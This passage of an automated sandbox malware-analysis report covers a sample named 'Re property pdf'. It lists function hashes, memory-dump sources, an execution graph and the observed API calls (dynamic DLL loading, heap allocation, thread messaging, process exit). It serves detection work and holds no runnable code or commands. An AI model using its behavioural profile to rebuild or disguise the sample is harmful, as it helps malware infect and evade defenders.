                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 40bdcc8edc766d3569713ad9079d862d591c3d1543d0e93836aa871cfc76f1ca
                                                                                                                              • Instruction ID: 71c7d1d3b353e9a32aaa7e6e60ab92fbe6c445dff8c724ebf9bd86ed7cb21e78
                                                                                                                              • Opcode Fuzzy Hash: 40bdcc8edc766d3569713ad9079d862d591c3d1543d0e93836aa871cfc76f1ca
                                                                                                                              • Instruction Fuzzy Hash: BB511AB1E042598FDB14CFA9C9805AEFBF2BF89304F24D169D418AB256D7319E42CF61
                                                                                                                              Function 07721FBB Relevance: .1, Instructions: 133COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5ba50cd248b00dd18a721c1d6dd59bd1ee02d276df451ae7402538e14b065c0b
                                                                                                                              • Instruction ID: b227dc8ba11c0e2c81e233e67f85a81c6974babb2d2ed745b7aa19c7dbd8855d
                                                                                                                              • Opcode Fuzzy Hash: 5ba50cd248b00dd18a721c1d6dd59bd1ee02d276df451ae7402538e14b065c0b
                                                                                                                              • Instruction Fuzzy Hash: A4511BB5E052598FCB14CFA9C9805AEFBF2BF89304F24C169D418AB356D7319A42CF61
                                                                                                                              Function 07722828 Relevance: .1, Instructions: 132COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9265de122cea7d8b576cb3d1b15f9f3373e3527fe93e3291ca71a44b619e9928
                                                                                                                              • Instruction ID: d10f7d5b93a3566d0f45352b4f84bad49e137b325db9c2485a59beea70ca5e48
                                                                                                                              • Opcode Fuzzy Hash: 9265de122cea7d8b576cb3d1b15f9f3373e3527fe93e3291ca71a44b619e9928
                                                                                                                              • Instruction Fuzzy Hash: 57510AB1E042198FDB14DFA9C5806AEFBF2BF89304F24C16AD458BB216D7319942CF60
                                                                                                                              Function 0130B888 Relevance: .1, Instructions: 124COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1788930478.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1300000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5a6f813fe58f475782cfccd6713c290067c801407491b6691ce70586030549a5
                                                                                                                              • Instruction ID: 31728c881c70bd7aeb13aaf48e5c0d20268fb84fd45915bbd42f5861b906874a
                                                                                                                              • Opcode Fuzzy Hash: 5a6f813fe58f475782cfccd6713c290067c801407491b6691ce70586030549a5
                                                                                                                              • Instruction Fuzzy Hash: F5413A764043C19FC378DF38CDCB557BFA8AF413187798A8DD2DADA1A1D2258A51CA90
                                                                                                                              Function 052FA057 Relevance: .1, Instructions: 78COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1793745865.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_52f0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1031c23f9814deea3077846c6a2e8decf297627ccb2d3f43987c4b7ed6168016
                                                                                                                              • Instruction ID: 8b9bd2a2badf157533e2684e4cf045ca540ffa89b63a29720c2c19a3d7cabe8d
                                                                                                                              • Opcode Fuzzy Hash: 1031c23f9814deea3077846c6a2e8decf297627ccb2d3f43987c4b7ed6168016
                                                                                                                              • Instruction Fuzzy Hash: B9315A2690D3CE15DB23A3B894993CDBFB25F0B018F2C48DECDC0AA593D685805BD345

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:1.2%
                                                                                                                              Dynamic/Decrypted Code Coverage:5.6%
                                                                                                                              Signature Coverage:3.2%
                                                                                                                              Total number of Nodes:126
                                                                                                                              Total number of Limit Nodes:8
                                                                                                                              execution_graph 93927 42f463 93928 42f473 93927->93928 93929 42f479 93927->93929 93932 42e383 93929->93932 93931 42f49f 93935 42c543 93932->93935 93934 42e39e 93934->93931 93936 42c55d 93935->93936 93937 42c56e RtlAllocateHeap 93936->93937 93937->93934 93938 42b823 93939 42b840 93938->93939 93942 1042df0 LdrInitializeThunk 93939->93942 93940 42b868 93942->93940 93943 4245c3 93944 4245df 93943->93944 93945 424607 93944->93945 93946 42461b 93944->93946 93947 42c233 NtClose 93945->93947 93953 42c233 93946->93953 93949 424610 93947->93949 93950 424624 93956 42e3c3 RtlAllocateHeap 93950->93956 93952 42462f 93954 42c250 93953->93954 93955 42c261 NtClose 93954->93955 93955->93950 93956->93952 93979 424953 93980 42496c 93979->93980 93981 4249b7 93980->93981 93984 4249f4 93980->93984 93986 4249f9 93980->93986 93987 42e2a3 93981->93987 93985 42e2a3 RtlFreeHeap 93984->93985 93985->93986 93990 42c593 93987->93990 93989 4249c4 93991 42c5b0 93990->93991 93992 42c5c1 RtlFreeHeap 93991->93992 93992->93989 93993 42f593 93994 42f503 93993->93994 93995 42f560 93994->93995 93996 42e383 RtlAllocateHeap 93994->93996 93997 42f53d 93996->93997 93998 42e2a3 RtlFreeHeap 93997->93998 93998->93995 93957 413763 93960 42c4b3 93957->93960 93961 42c4cd 93960->93961 93964 1042c70 LdrInitializeThunk 93961->93964 93962 413785 93964->93962 93965 413cc3 93966 413cca 93965->93966 93971 417483 93966->93971 93968 413cfb 93969 413d40 93968->93969 93970 413d2f PostThreadMessageW 93968->93970 93970->93969 93972 4174a7 93971->93972 93973 4174e3 LdrLoadDll 93972->93973 93974 4174ae 93972->93974 93973->93974 93974->93968 93999 41afb3 94000 41aff7 93999->94000 94001 42c233 NtClose 94000->94001 94002 41b018 94000->94002 94001->94002 93975 1042b60 LdrInitializeThunk 94003 401bd5 94004 401bf8 94003->94004 94007 42f933 94004->94007 94010 42de63 94007->94010 94011 42de89 94010->94011 94022 4073e3 94011->94022 94013 42de9f 94014 401d70 94013->94014 94025 41adc3 94013->94025 94016 42debe 94017 42ded3 94016->94017 94040 42c5e3 94016->94040 94036 427ef3 94017->94036 94020 42deed 94021 42c5e3 ExitProcess 94020->94021 94021->94014 94043 416143 94022->94043 94024 4073f0 94024->94013 94026 41adef 94025->94026 94061 41acb3 94026->94061 94029 41ae34 94032 41ae50 94029->94032 94034 42c233 NtClose 94029->94034 94030 41ae1c 94031 41ae27 94030->94031 94033 42c233 NtClose 94030->94033 94031->94016 94032->94016 94033->94031 94035 41ae46 94034->94035 94035->94016 94037 427f55 94036->94037 94039 427f62 94037->94039 94072 4182f3 94037->94072 94039->94020 94041 42c5fd 94040->94041 94042 42c60e ExitProcess 94041->94042 94042->94017 94044 41615d 94043->94044 94046 416176 94044->94046 94047 42cc83 94044->94047 94046->94024 94049 42cc9d 94047->94049 94048 42cccc 94048->94046 94049->94048 94054 42b873 94049->94054 94052 42e2a3 RtlFreeHeap 94053 42cd3f 94052->94053 94053->94046 94055 42b88d 94054->94055 94058 1042c0a 94055->94058 94056 42b8b9 94056->94052 94059 1042c11 94058->94059 94060 1042c1f LdrInitializeThunk 94058->94060 94059->94056 94060->94056 94062 41accd 94061->94062 94066 41ada9 94061->94066 94067 42b913 94062->94067 94065 42c233 NtClose 94065->94066 94066->94029 94066->94030 94068 42b930 94067->94068 94071 10435c0 LdrInitializeThunk 94068->94071 94069 41ad9d 94069->94065 94071->94069 94074 418303 94072->94074 94073 41882b 94073->94039 94074->94073 94080 413943 94074->94080 94076 41844a 94076->94073 94077 42e2a3 RtlFreeHeap 94076->94077 94078 418462 94077->94078 94078->94073 94079 42c5e3 ExitProcess 94078->94079 94079->94073 94084 413963 94080->94084 94082 4139cc 94082->94076 94083 4139c2 94083->94076 94084->94082 94085 41b0d3 RtlFreeHeap LdrInitializeThunk 94084->94085 94085->94083 93976 418a48 93977 42c233 NtClose 93976->93977 93978 418a52 93977->93978

                                                                                                                              Executed Functions

                                                                                                                              Function 00417483 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 728 417483-41749f 729 4174a7-4174ac 728->729 730 4174a2 call 42efa3 728->730 731 4174b2-4174c0 call 42f5a3 729->731 732 4174ae-4174b1 729->732 730->729 735 4174d0-4174e1 call 42d933 731->735 736 4174c2-4174cd call 42f843 731->736 741 4174e3-4174f7 LdrLoadDll 735->741 742 4174fa-4174fd 735->742 736->735 741->742
                                                                                                                              APIs
                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004174F5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_Re property pdf.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Load
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2234796835-0
                                                                                                                              • Opcode ID: 335b9d072062c93c8d5841efebb952b058b4076accb46d6834c6a2a97a5bff61
                                                                                                                              • Instruction ID: 28b4890146ce45405500527ca045c3249d8b7403630f172c74c7069256cc13f2
                                                                                                                              • Opcode Fuzzy Hash: 335b9d072062c93c8d5841efebb952b058b4076accb46d6834c6a2a97a5bff61
                                                                                                                              • Instruction Fuzzy Hash: 64011EB5E4020DBBDF10DAE5DC42FDEB7789B54308F4081AAE90897241F635EB588B95
                                                                                                                              Function 0042C233 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 753 42c233-42c26f call 404693 call 42d453 NtClose
                                                                                                                              APIs
                                                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C26A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_Re property pdf.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Close
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3535843008-0
                                                                                                                              • Opcode ID: e2b4365f338ebfd7809c8d1bc070f32a336d522b612cb9306e0a8c1fccd46b62
                                                                                                                              • Instruction ID: b0720475a24e4fb921e2fcb4d3bcce76bf947cad237faf3740dd50ce58ed5a96
                                                                                                                              • Opcode Fuzzy Hash: e2b4365f338ebfd7809c8d1bc070f32a336d522b612cb9306e0a8c1fccd46b62
                                                                                                                              • Instruction Fuzzy Hash: B3E086316043147BD610FA5ADC42F9B776CEFC5754F408419FA0C67241DA75790187F4
                                                                                                                              Function 01042B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 0d7f3c7c3df33d502e8a8725b4c6434a1072e2127b2afa4e2ac71ca786637d48
                                                                                                                              • Instruction ID: 943e43e531f6ae574a5d62bd93a9e543ea513a29bf4b0a102d4de3bd96b442e4
                                                                                                                              • Opcode Fuzzy Hash: 0d7f3c7c3df33d502e8a8725b4c6434a1072e2127b2afa4e2ac71ca786637d48
                                                                                                                              • Instruction Fuzzy Hash: 6490026120240003524571598414617400A97E0201B55C022F9414590DC5258D916625
                                                                                                                              Function 01042DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 89d55e39f9c2026276ac106a818a6c0ae6951a7f7069f8b2d03631b79b9080d4
                                                                                                                              • Instruction ID: f8a3217b10e772ebab4bd2e79d2b7d4504856353885981b4bbe7b1e803916f72
                                                                                                                              • Opcode Fuzzy Hash: 89d55e39f9c2026276ac106a818a6c0ae6951a7f7069f8b2d03631b79b9080d4
                                                                                                                              • Instruction Fuzzy Hash: 4190023120140413E25171598504707000997D0241F95C413B8824558DD6568E52A621
                                                                                                                              Function 01042C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 6419f5929cc397fef4c7a7fe13706da39086db5941bc7d6ca941be905dc5744f
                                                                                                                              • Instruction ID: 9008c73ef24a6ab6e22552bca4f7e4dc73aa1c7191754d580e62e8200a0bbab4
                                                                                                                              • Opcode Fuzzy Hash: 6419f5929cc397fef4c7a7fe13706da39086db5941bc7d6ca941be905dc5744f
                                                                                                                              • Instruction Fuzzy Hash: F790023120148802E2507159C40474B000597D0301F59C412BC824658DC6958D917621
                                                                                                                              Function 010435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: a57815f2edaef03191f11afb3e8b239f2555e299df2bab38f5e530724c00e74c
                                                                                                                              • Instruction ID: 5cd7f98b51dd48f499db8112f9e8aec8fda65e0f37dcb07ce2d2d6b9dd72eb6c
                                                                                                                              • Opcode Fuzzy Hash: a57815f2edaef03191f11afb3e8b239f2555e299df2bab38f5e530724c00e74c
                                                                                                                              • Instruction Fuzzy Hash: ED90023160550402E24071598514707100597D0201F65C412B8824568DC7958E516AA2
                                                                                                                              Function 00413B6B Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 202COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 413b6b-413b77 1 413b00-413b06 0->1 2 413b79-413b82 0->2 3 413b83-413b93 2->3 4 413b94 3->4 5 413b95-413b9b 4->5 6 413b9d-413ba1 5->6 7 413c0e-413c1c 5->7 10 413ba3-413bab 6->10 11 413b6a 6->11 8 413c1f-413c24 7->8 9 413bae-413bb3 7->9 13 413c26-413c2b 8->13 14 413c4f-413c62 8->14 9->4 12 413bb5-413bbc 9->12 10->3 15 413bad 10->15 16 413bda-413bde 12->16 17 413bbe-413bcf 12->17 18 413c86-413c99 13->18 19 413c2d-413c49 13->19 14->18 15->9 16->5 22 413be0-413c01 16->22 20 413bd1-413bd8 17->20 21 413b64 17->21 24 413c9b-413ca0 18->24 25 413cca-413ceb call 42e343 call 42ed53 18->25 20->16 21->11 33 413c02-413c0d 22->33 26 413ca3-413ca4 24->26 29 413ced-413d2d call 417483 call 404603 call 424a73 25->29 28 413ca6-413cad 26->28 26->29 28->26 32 413caf-413cc1 28->32 42 413d4d-413d53 29->42 43 413d2f-413d3e PostThreadMessageW 29->43 33->7 33->33 43->42 44 413d40-413d4a 43->44 44->42
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_Re property pdf.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 15IDF6Mq$15IDF6Mq
                                                                                                                              • API String ID: 0-4010031901
                                                                                                                              • Opcode ID: 0c054b2e2743c0eeebd6be58e9f5c20462628b9db88d6ef38060c3b80f84a4a8
                                                                                                                              • Instruction ID: ebba4b18cca7dcd981ad835e14fc0cccd4e2cf3c00ace72577cf58a60fdd8a72
                                                                                                                              • Opcode Fuzzy Hash: 0c054b2e2743c0eeebd6be58e9f5c20462628b9db88d6ef38060c3b80f84a4a8
                                                                                                                              • Instruction Fuzzy Hash: 95510E72544259AFDB10DE74DC41AEEFB78EF02B65F54409EE804AB202E32D8A86C7D5
                                                                                                                              Function 00413CC3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(15IDF6Mq,00000111,00000000,00000000), ref: 00413D3A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_Re property pdf.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 15IDF6Mq$15IDF6Mq
                                                                                                                              • API String ID: 1836367815-4010031901
                                                                                                                              • Opcode ID: e376cca1ad9bd8a113c4203a4ffe58d65e338f52ece443c5481eb9a3b4813f4b
                                                                                                                              • Instruction ID: 16e16fc7eac4357e8694f6d27673bc8143868d4d6300a36bccf1126233710ccb
                                                                                                                              • Opcode Fuzzy Hash: e376cca1ad9bd8a113c4203a4ffe58d65e338f52ece443c5481eb9a3b4813f4b
                                                                                                                              • Instruction Fuzzy Hash: 4D01D6B2D4015C7ADB10AAE19C81DEF7B7CDF41794F048069FA14A7241D57C4F0687B5
                                                                                                                              Function 0042C543 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 743 42c543-42c584 call 404693 call 42d453 RtlAllocateHeap
                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(?,0041E234,?,?,00000000,?,0041E234,?,?,?), ref: 0042C57F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_Re property pdf.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1279760036-0
                                                                                                                              • Opcode ID: 6131e9b8769fd76ef58628b03dbce2fc44f0f733c409865169e0a5bc9ebd3aa8
                                                                                                                              • Instruction ID: 88e57f121077c93bfb3ac01a0126dec20d148ab05c2f338d53066e093961bc1b
                                                                                                                              • Opcode Fuzzy Hash: 6131e9b8769fd76ef58628b03dbce2fc44f0f733c409865169e0a5bc9ebd3aa8
                                                                                                                              • Instruction Fuzzy Hash: 98E06D75604304BBC610EE59EC41F9B73ACEFC9714F00441AFA0CA7241D674B910CAB8
                                                                                                                              Function 0042C593 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 748 42c593-42c5d7 call 404693 call 42d453 RtlFreeHeap
                                                                                                                              APIs
                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,98BADCFE,00000007,00000000,00000004,00000000,00416D04,000000F4), ref: 0042C5D2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_Re property pdf.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3298025750-0
                                                                                                                              • Opcode ID: ba06928bb99b711efa01ad95a516d20c5fcccbcb308da22b3f919219b40991e2
                                                                                                                              • Instruction ID: bfa113c57d58501489df2f20a837258d55bee8994ce296129a5bc18aab46574b
                                                                                                                              • Opcode Fuzzy Hash: ba06928bb99b711efa01ad95a516d20c5fcccbcb308da22b3f919219b40991e2
                                                                                                                              • Instruction Fuzzy Hash: 6FE06D716043147BC610EE99EC41F9B77ACDFC9714F008419FA0CA7241DA74BD108AB8
                                                                                                                              Function 0042C5E3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 758 42c5e3-42c61c call 404693 call 42d453 ExitProcess
                                                                                                                              APIs
                                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,E2D3A29D,?,?,E2D3A29D), ref: 0042C617
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_Re property pdf.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExitProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 621844428-0
                                                                                                                              • Opcode ID: 458d2bd5877136ef5d94cd4a16485d3ddad388c695dac579b0ae7c22357d7221
                                                                                                                              • Instruction ID: 44cb167251a7af3eafba846379e090414fc2f29caf30565a5efa54af6ca352db
                                                                                                                              • Opcode Fuzzy Hash: 458d2bd5877136ef5d94cd4a16485d3ddad388c695dac579b0ae7c22357d7221
                                                                                                                              • Instruction Fuzzy Hash: 9DE04F752102147BD210BB5ADC01F9B779CDBC5754F404429FA1867242C675790586E8
                                                                                                                              Function 01042C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 763 1042c0a-1042c0f 764 1042c11-1042c18 763->764 765 1042c1f-1042c26 LdrInitializeThunk 763->765
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: d34150ab1a86e3f31102741c337da352ccd812e877dc768de225b2df1dbb269e
                                                                                                                              • Instruction ID: 453b4d696114004e5306233835a2281419c845ed04636bc3aad17baf82e90624
                                                                                                                              • Opcode Fuzzy Hash: d34150ab1a86e3f31102741c337da352ccd812e877dc768de225b2df1dbb269e
                                                                                                                              • Instruction Fuzzy Hash: F2B09B719015C5C6EB51E7645608717794077D0701F15C072F6430641F4778C5D1E675

                                                                                                                              Non-executed Functions

                                                                                                                              Function 01082349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-2160512332
                                                                                                                              • Opcode ID: f531d8d28427ba49d0416c1acf8d866fe4284961127fc506a28b784c64069bc7
                                                                                                                              • Instruction ID: b77ba31705c1c26eb0feb75a000d266a0b188a817176aa02885c2a666bba656f
                                                                                                                              • Opcode Fuzzy Hash: f531d8d28427ba49d0416c1acf8d866fe4284961127fc506a28b784c64069bc7
                                                                                                                              • Instruction Fuzzy Hash: C4928F71608741AFE721EF18C880B6BBBE8BB84754F04492DFAD5D7291D774E844CB92
                                                                                                                              Function 01038620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • corrupted critical section, xrefs: 010754C2
                                                                                                                              • Critical section address, xrefs: 01075425, 010754BC, 01075534
                                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010754E2
                                                                                                                              • 8, xrefs: 010752E3
                                                                                                                              • Address of the debug info found in the active list., xrefs: 010754AE, 010754FA
                                                                                                                              • Thread identifier, xrefs: 0107553A
                                                                                                                              • double initialized or corrupted critical section, xrefs: 01075508
                                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010754CE
                                                                                                                              • undeleted critical section in freed memory, xrefs: 0107542B
                                                                                                                              • Critical section address., xrefs: 01075502
                                                                                                                              • Invalid debug info address of this critical section, xrefs: 010754B6
                                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01075543
                                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0107540A, 01075496, 01075519
                                                                                                                              • Critical section debug info address, xrefs: 0107541F, 0107552E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                              • API String ID: 0-2368682639
                                                                                                                              • Opcode ID: 66c3c782ca13dc6f6b60b59b9f6541b63b2c8091eff91e63e56810ab406748d8
                                                                                                                              • Instruction ID: adbd818cc0dfc0b1212a869042f226bcc2828007693fd417f5a8d4867f9f09f8
